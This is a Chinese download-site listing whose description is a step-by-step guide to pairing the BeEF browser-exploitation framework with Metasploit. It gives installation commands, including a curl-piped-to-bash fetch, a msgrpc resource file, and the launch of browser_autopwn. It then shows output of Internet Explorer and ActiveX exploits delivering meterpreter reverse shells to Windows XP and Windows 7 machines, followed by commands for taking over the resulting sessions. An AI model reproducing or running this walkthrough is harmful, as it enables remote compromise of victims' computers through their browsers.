metasploit中可以用最新beef插件
文件大小: 2884k
源码售价: 10 个金币 积分规则     积分充值
资源说明:下载beef 解压到 /pentest/web/beef/ cd /pentest/web/beef/ curl -L get.rvm.io | bash -s stable rvm install 1.9.3 rvm use 1.9.3 ##rvm remove 1.9.2 ruby -v gem install bundler bundle install ./beef 生成一个beef.rc的文件,内容是 load msgrpc ServerHost=127.0.0.1 Pass=abc123 cd /opt/metasploit/apps/pro/msf3/ msfconsole -r beef.rc cd /pentest/web/beef/ ./beef use auxiliary/server/browser_autopwn set LHOST youip set LHOST 192.168.1.164 run Starting exploit windows/browser/ms10_018_ie_behaviors with payload windows/meterpreter/reverse_tcp winxpsp3 ------------------------------- [*]1 Starting exploit windows/browser/ntr_activex_check_bof with payload windows/meterpreter/reverse_tcp win7可以用2个漏洞 2Starting exploit windows/browser/ntr_activex_stopmodule with payload windows/meterpreter/reverse_tcp ---------------------------------- sessions -i 1 使用session sessions -l所有session 然后meterpater 使用shell, 具体请到http://user.qzone.qq.com/609005832/2查看详细 或http://blog.csdn.net/oshuangyue12/article/details/24987881
本源码包内暂不包含可直接显示的源代码文件,请下载源码包。